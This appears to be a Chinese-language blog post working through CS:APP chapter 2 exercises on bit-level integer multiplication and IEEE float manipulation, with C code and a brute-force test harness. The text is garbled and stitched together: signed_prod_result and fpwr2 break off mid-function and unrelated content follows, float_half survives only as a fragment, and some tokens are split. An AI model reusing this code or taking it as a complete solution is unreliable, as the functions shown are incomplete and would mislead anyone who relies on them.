unsigned unsigned_high_prod(unsigned x, unsigned y){int w = sizeof(int)<<3;return signed_high_prod(x, y) + (x>>(w-1))*y + x*(y>>(w-1)); }当然,这里用了乘法,不属于整数位级编码规则,聪明的办法是使用int进行移位,并使用与运算。
即 ((int)x>>(w-1)) & y 和 ((int)y>>(w-1)) & x。
注:不使用long long来实现signed_high_prod(int x, int y)是一件比较复杂的工作,而且我不会只使用整数位级编码规则来实现,因为需要使用循环和条件判断。
下面的代码是计算两个整数相乘得到的高位和低位。
int uadd_ok(unsigned x, unsigned y){return x + y >= x;}void signed_prod_result(int x, int y, int &h, int &l){ int w = sizeof(int)<<3;h = 0;A. false,float只能精确表示最高位1和最低位的1的位数之差小于24的整数。
所以当x==TMAX时,用float就无法精确表示,但double是可以精确表示所有32位整数的。
B. false,当x+y越界时,左边不会越界,而右边会越界。
C. true,double可以精确表示所有正负2^53以内的所有整数。
所以三个数相加可以精确表示。
D. false,double无法精确表示2^64以内所有的数,所以该表达式很有可能不会相等。
虽然举例子会比较复杂,但可以考虑比较大的值。
E. false,0/0.0为NaN,(非0)/0.0为正负inf。
同号inf相减为NaN,异号inf 相减也为被减数的inf。
2.89float的k=8, n=23。
bias = 2^7 - 1 = 127。
最小的正非规格化数为2^(1-bias-n) = 2^-149。
最小的规格化数为2^(0-bias)*2 = 2^-126。
最大的规格化数(二的幂)为2^(2^8-2 - bias) = 2^127。
因此按各种情况把区间分为[TMin, -148] [-149, -125] [-126, 127] [128, TMax]。
float fpwr2(int x){/* Result exponent and fraction */unsigned exp, frac;unsigned u;if (x < -149) {/* Too small. Return 0.0 */exp = 0;typedef unsigned float_bits;float u2f(unsigned x){return *((float*)&x);}unsigned f2u(float f){return *((unsigned*)&f);}bool is_float_equal(float_bits f1, float f2){return f2u(f2) == f1;}bool is_nan(float_bits fb){unsigned sign = fb>>31;unsigned exp = (fb>>23) & 0xFF;unsigned frac = fb&0x7FFFFF;return exp == 0xFF && frac != 0;}bool is_inf(float_bits fb){unsigned sign = fb>>31;unsigned exp = (fb>>23) & 0xFF;unsigned frac = fb&0x7FFFFF;return exp == 0xFF && frac == 0;}int testFun( float_bits(*fun1)(float_bits), float(*fun2)(float)) {unsigned x = 0;do{ //test for all 2^32 valuefloat_bits fb = fun1(x);float ff = fun2(u2f(x));if(!is_float_equal(fb, ff)){printf("%x error\n", x);return0;}x++;}while(x!=0);printf("Test OK\n");return1;}最后的testFun是用来测试fun1和fun2是否对每种可能的输入都输出相同的值,fun1为题中所要求的函数,fun2为float版本。
这个函数大概会运行2到3分钟,也可以写多线程,利用多核处理器求解。
2.91float_bits float_absval(float_bits f){if(is_nan(f)) return f;else return f & 0x7FFFFFFF;}float float_absval_f(float f){if(is_nan(f2u(f))) return f;else return fabs(f);}测试即调用testFun(float_absval, float_absval_f);在测试的时候发现0x7F800001的时候不对了。
后来debug了一下,发现u2f的时候,会篡改原值。
即令x = 0x7F800001。
== 1) return sign<<31 | (( (1<<22) | (frac>>1)) + ((frac&1)&&((fr ac>>1)&1))) ;else if(exp != 255) return sign<<31 | (exp-1) << 23 | frac;else return f;}float float_half_f(float f){if(!isnan(f)) return (float)0.5*f;else return f;}需要注意的是,舍入采用的是向偶数舍入。
这也是我在测试的过程中发现的。
(好吧,书上在浮点数位级编码规则中说过了,眼残没看到)最后,非规格化的平滑效果让exp==1时的程序变得比较简洁。
2.94float_bits float_twice(float_bits f){unsigned sign = f>>31;unsigned exp = (f>>23) & 0xFF;unsigned frac = f&0x7FFFFF;if(exp == 0) return sign<<31 | frac<<1;else if(exp < 254) return sign<<31 | (exp+1)<<23 | frac;else if(exp == 254) return sign<<31 | 0xFF<<23;else return f;}float float_twice_f(float f){if(!isnan(f)) return (float)2*f;else return f;}比float_half简单一些。